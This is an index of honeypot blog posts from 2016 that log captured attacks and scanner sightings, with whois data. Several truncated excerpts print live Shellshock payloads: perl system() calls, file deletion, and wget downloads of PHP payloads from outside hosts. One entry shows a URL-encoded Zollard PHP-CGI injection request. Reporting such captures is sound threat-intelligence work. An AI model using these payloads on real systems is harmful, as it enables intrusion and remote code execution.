Jörg Stephan
Jörg's posts

end of life
Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues. The vservers will be going down soon. So no more analytics. Thanks to Swen for ha...

159.226.162.196 - #perl wget via 204.232.209.188
BEGIN OF HTTP DATA: 2016-02-11 19:15:33 Source IP: 159.226.162.196 GET HTTP/1.1 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget...

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)
BEGIN OF HTTP DATA: 2016-01-23 16:47:13 Source IP: 61.49.45.47 GET / HTTP/1.1 User-Agent: WhatWeb/0.4.8-dev Host: 109.234.106.8:8080 Connection: close Accept: /  For more information https://user-agents.me/crawler/whatweb048-dev According to some news in ...

213.136.72.84 - Shellshock perl via 204.232.209.188
BEGIN OF HTTP DATA: 2016-01-20 09:58:59 Source IP: 213.136.72.84 GET HTTP/1.1 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget h...

92.45.197.218 - Zollard php execution
BEGIN OF HTTP DATA: 2016-01-21 09:47:25 Source IP: 92.45.197.218 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F %66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F...

Scanner seen on January 14, 2016
185.130.5.207 - muieblackcat 37.142.32.222 - masscan/1.0 149.78.19.136 -  masscan/1.0 195.169.125.87 -  zgrab/0.x  185.130.5.235 -  muieblackcat 185.130.5[.]207 Whois Data (TeamCymru) AS : 203569 IP : 185.130.5.207 BGP Prefix : ...

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090
BEGIN OF HTTP DATA: 2016-01-13 08:48:44 Source IP: 83.54.165.57 GET /cgi-bin/authLogin.cgi HTTP/1.1 Host: 127.0.0.1 User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php...

Scanner seen on January 11,12 2016
208.100.26.231 - Nmap Scripting Engine 141.212.122.81 -  zgrab/0.x 141.212.122.145 -  zgrab/0.x 208.100.26[.]231 Whois Data (TeamCymru) AS : 32748 IP : 208.100.26.231 BGP Prefix : 208.100.0.0/18 CC : US Registry : arin Alloca...

85.73.42.84 - wget via http://lliillii.altervista.org/io.php
BEGIN OF HTTP DATA: 2016-01-08 10:07:22 Source IP: 85.73.42.84 GET /cgi-bin/authLogin.cgi HTTP/1.1 Host: 127.0.0.1 User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1 85.73.42[.]84...

Scanner seen on January 9, 2016
93.174.93.203 - masscan/1.0 141.212.122.145 - zgrab/0.x 69.30.217.226 - muieblackcat 93.174.93[.]203 Whois Data (TeamCymru) AS : 29073 IP : 93.174.93.203 BGP Prefix : 93.174.88.0/21 CC : NL Registry : ripencc Allocated : 20...